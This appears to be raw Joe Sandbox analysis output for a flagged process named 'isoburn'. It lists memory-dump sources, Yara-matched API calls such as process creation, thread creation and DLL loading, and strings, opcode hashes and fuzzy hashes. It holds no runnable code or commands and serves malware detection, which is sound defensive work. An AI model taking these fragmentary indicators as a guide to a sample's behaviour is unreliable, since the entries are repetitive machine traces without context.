                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 1b540ceb1894549855ed5a88feb65e615e7cd667191b7b95bb5ea39539673dcf
                                                                          • Instruction ID: 9b54206aaa422cb807ae6138cdee9d2e92a82f801ccbfd21e7341e893150e2c8
                                                                          • Opcode Fuzzy Hash: 1b540ceb1894549855ed5a88feb65e615e7cd667191b7b95bb5ea39539673dcf
                                                                          • Instruction Fuzzy Hash: 1D900222601400424140716888849464015ABF12217A5C122B4998550E8A598D655A65
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: ab3a347070e39cd17b036647c58e52a698c7166655cd5040eb2e02c1df6bef27
                                                                          • Instruction ID: a3978f74e176954045cc26bf46284468fee4be828619b7f2949f16b7b9ca04c1
                                                                          • Opcode Fuzzy Hash: ab3a347070e39cd17b036647c58e52a698c7166655cd5040eb2e02c1df6bef27
                                                                          • Instruction Fuzzy Hash: C090026220180403D14075584844647001587E0312FA5C012B6064555F8F298D516535
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 70d275eeb32768c9381e58fae67c1e7cd0a972a63c1d8eb01db324e4f2c9cb52
                                                                          • Instruction ID: 27bb27b96f50822c0cf9df9019bc493dc11e04e2bfe6d3d9fea4115d64cc6dc1
                                                                          • Opcode Fuzzy Hash: 70d275eeb32768c9381e58fae67c1e7cd0a972a63c1d8eb01db324e4f2c9cb52
                                                                          • Instruction Fuzzy Hash: 1890022260140502D10171584444656001A87E0251FE5C023B5024555FCF258E92A531
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 87dbb22019714da400ede34c6d2d372fd30239b71c6d8f2c88e5779a55568368
                                                                          • Instruction ID: 5b195ac090c5829f5ae06cd6c35fe1f83d631ee7283341974b57bf79366acb75
                                                                          • Opcode Fuzzy Hash: 87dbb22019714da400ede34c6d2d372fd30239b71c6d8f2c88e5779a55568368
                                                                          • Instruction Fuzzy Hash: 2D90026220240003410571584454656401A87F0211BA5C022F5014590ECA258D916525
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: b00f8ebddae3dfca8330eeec8cfeb1eb3f705c56637bb00a9078a3e2f6e34a6d
                                                                          • Instruction ID: 5a73f15ac2f43ca093864956395b36e159d02fcefccd7db2d7afdd51ab585ec1
                                                                          • Opcode Fuzzy Hash: b00f8ebddae3dfca8330eeec8cfeb1eb3f705c56637bb00a9078a3e2f6e34a6d
                                                                          • Instruction Fuzzy Hash: 4F90023220544842D14071584444A86002587E0315FA5C012B4064694E9B258E55BA61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: df9beca98bd60d16bce575c393b3d9219b6e27c6fa1920580e9d2d3324bbf050
                                                                          • Instruction ID: 3fd77ece48640b326a04393af778ba63479279e6ec356a740074e259d1b6521b
                                                                          • Opcode Fuzzy Hash: df9beca98bd60d16bce575c393b3d9219b6e27c6fa1920580e9d2d3324bbf050
                                                                          • Instruction Fuzzy Hash: A390023220140802D1807158444468A001587E1311FE5C016B4025654ECF158F597BA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: a41188424c6e6a0f7930e54a5a1cf0d685d2afd8242fc6d17e0388cd2cb19ce6
                                                                          • Instruction ID: d1f2d1c0f7c514685b5ab893486422e698fad9b4db08af01fc03f9bae7df1366
                                                                          • Opcode Fuzzy Hash: a41188424c6e6a0f7930e54a5a1cf0d685d2afd8242fc6d17e0388cd2cb19ce6
                                                                          • Instruction Fuzzy Hash: 8590023260540802D15071584454786001587E0311FA5C012B4024654E8B558F557AA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: f2fd0c350ae1990aa460aebb72af0af65de418c9ef3a5033854803d044bedb49
                                                                          • Instruction ID: 04c47e88f41467f19d014e5bfc441c3a4a5b2313fc9e1f4dbf4558c79b4e00ba
                                                                          • Opcode Fuzzy Hash: f2fd0c350ae1990aa460aebb72af0af65de418c9ef3a5033854803d044bedb49
                                                                          • Instruction Fuzzy Hash: B7900226211400030105B5580744547005687E53613A5C022F5015550DDB218D615521
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 58c1204fcbe8a9faf64e3ef36b74fb0c61b548ea583c734788e41fc059dbcd4a
                                                                          • Instruction ID: 14fcd9f4ae4117456be4952e7cc400fa160d8005e8833f3b6fbc32130e40898d
                                                                          • Opcode Fuzzy Hash: 58c1204fcbe8a9faf64e3ef36b74fb0c61b548ea583c734788e41fc059dbcd4a
                                                                          • Instruction Fuzzy Hash: 66900226221400020145B558064454B045597E63613E5C016F5416590DCB218D655721
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 3bf601279eda013245f2f541c961cbc58aa9a8081e4fc721810ec5a73aeb1c50
                                                                          • Instruction ID: b0ae162a2ca66c63732b8eb4a84822b84fbfa8718f9d83a696568b82906c58c7
                                                                          • Opcode Fuzzy Hash: 3bf601279eda013245f2f541c961cbc58aa9a8081e4fc721810ec5a73aeb1c50
                                                                          • Instruction Fuzzy Hash: F690023260550402D10071584554746101587E0211FB5C412B4424568E8B958E5169A2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 73d6d20decf87dbd910f1ef0f0171d5777db8d6140d8523df7ddd5ca9e704a21
                                                                          • Instruction ID: 30df5b0dfbabf851d41f12b11bc772387876e3c43843ec8bae28ca87a8fdf0d1
                                                                          • Opcode Fuzzy Hash: 73d6d20decf87dbd910f1ef0f0171d5777db8d6140d8523df7ddd5ca9e704a21
                                                                          • Instruction Fuzzy Hash: 1590022224545102D150715C44446564015A7F0211FA5C022B4814594E8A558D556621
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 7e327r58$7e327r58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • PostThreadMessageW.USER32(7e327r58,00000111,00000000,00000000), ref: 02ED0997
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID: 7e327r58$7e327r58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • PostThreadMessageW.USER32(7e327r58,00000111,00000000,00000000), ref: 02ED0997
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID: 7e327r58$7e327r58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • Sleep.KERNELBASE(000007D0), ref: 02EE251B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID: net.dll$wininet.dll
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • Sleep.KERNELBASE(000007D0), ref: 02EE251B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID: net.dll$wininet.dll
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetFileAttributesW.KERNELBASE(?), ref: 02ED8C76
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID: @
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CoInitialize.OLE32(00000000), ref: 02EDE527
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Initialize
                                                                          • String ID: @J7<
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CoInitialize.OLE32(00000000), ref: 02EDE527
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Initialize
                                                                          • String ID: @J7<
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateProcessInternalW.KERNELBASE(02ED0DD1,02ED0DF9,02ED0BD1,00000000,02ED75B3,00000010,02ED0DF9,?,?,00000044,02ED0DF9,00000010,02ED75B3,00000000,02ED0BD1,02ED0DF9), ref: 02EE5583
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateInternalProcess
                                                                          • String ID:
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02ED4192
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Load
                                                                          • String ID:
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateProcessInternalW.KERNELBASE(02ED0DD1,02ED0DF9,02ED0BD1,00000000,02ED75B3,00000010,02ED0DF9,?,?,00000044,02ED0DF9,00000010,02ED75B3,00000000,02ED0BD1,02ED0DF9), ref: 02EE5583
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateInternalProcess
                                                                          • String ID:
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02EC99A5
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateThread
                                                                          • String ID:
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02EC99A5
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateThread
                                                                          • String ID:
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,23C78BFC,00000007,00000000,00000004,00000000,02ED3913,000000F0,?,?,?,?,00000000), ref: 02EE54CF
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID:
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(02ED1F66,?,02EE37E3,02ED1F66,02EE3557,02EE37E3,?,02ED1F66,02EE3557,00001000,?,?,02EE6CA0), ref: 02EE547C
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetFileAttributesW.KERNELBASE(?), ref: 02ED761C
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,02ED1A2A,02ED21A9,02EE3557,00000000), ref: 02ED7433
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorMode
                                                                          • String ID:
                                                                          • API String ID: 2340568224-0
                                                                          • Opcode ID: 26a8537f8ec240dea86e513593c943ab9d97c757713fe3b37d291765e484f7b7
                                                                          • Instruction ID: 7df6b34911e6524ef79aeaa62082447c1bed2f3422fd28677ef669cba56e920b
                                                                          • Opcode Fuzzy Hash: 26a8537f8ec240dea86e513593c943ab9d97c757713fe3b37d291765e484f7b7
                                                                          • Instruction Fuzzy Hash: D2E02631AC02002EE7809BF88C06FAA228CAB503A8F14C629F81CEA2D1F621B4054620
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,02ED1A2A,02ED21A9,02EE3557,00000000), ref: 02ED7433
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorMode
                                                                          • String ID:
                                                                          • API String ID: 2340568224-0
                                                                          • Opcode ID: d2a2b4edda2da953367c3c24d5c5aebed2b3062394d9fb6d9458327b5a9b220c
                                                                          • Instruction ID: d6d09e66d290b953fc10019e1e05c03f9d026b8817a22ff40c32a3f5a7d80722
                                                                          • Opcode Fuzzy Hash: d2a2b4edda2da953367c3c24d5c5aebed2b3062394d9fb6d9458327b5a9b220c
                                                                          • Instruction Fuzzy Hash: 66D05E726C42053BEA40EBF4CC46F96328DAB007A8F14C068F94CEB2C2E965F01146A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: ca0563430f23b9a25561630e5c92a86df93ee497b99b94e9674891ff1c0d56bb
                                                                          • Instruction ID: 9c6de92281865022a6369c576eb4825e5ed4732fa3ab51e47d3c5fe21bf75cf8
                                                                          • Opcode Fuzzy Hash: ca0563430f23b9a25561630e5c92a86df93ee497b99b94e9674891ff1c0d56bb
                                                                          • Instruction Fuzzy Hash: 4AB09B729455C5C5EA11E7604608B67791177D0711F65C063F3030651F4778C5D1E975
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a0ebee8b487f9b084570e16a6c39ca6229a609df2ac72fc373ae30b58edfc77c
                                                                          • Instruction ID: a7eda380ecf1ce68d0ec0abfd53f4c729532db83709ef95b5d1ebd720ed15e82
                                                                          • Opcode Fuzzy Hash: a0ebee8b487f9b084570e16a6c39ca6229a609df2ac72fc373ae30b58edfc77c
                                                                          • Instruction Fuzzy Hash: 51B0922BE5608812CA208C5E78422F4FB64D3C7631E4472FBEC4CA7202A187D66A55D9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                          • API String ID: 48624451-2108815105
                                                                          • Opcode ID: cfaa61fbf28aea7ef87436766c4d8a3c2a217464b95975d426da4edbb087dbef
                                                                          • Instruction ID: 2ad660871afd21e71bd98791e7826ca91a59d0bbdb7edc8e0027df1864eab5d2
                                                                          • Opcode Fuzzy Hash: cfaa61fbf28aea7ef87436766c4d8a3c2a217464b95975d426da4edbb087dbef
                                                                          • Instruction Fuzzy Hash: 2751DBBAB48116BFDB10DF59C8909FFF7B9BB08200B54826BF459D7641D274DE508BA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmp
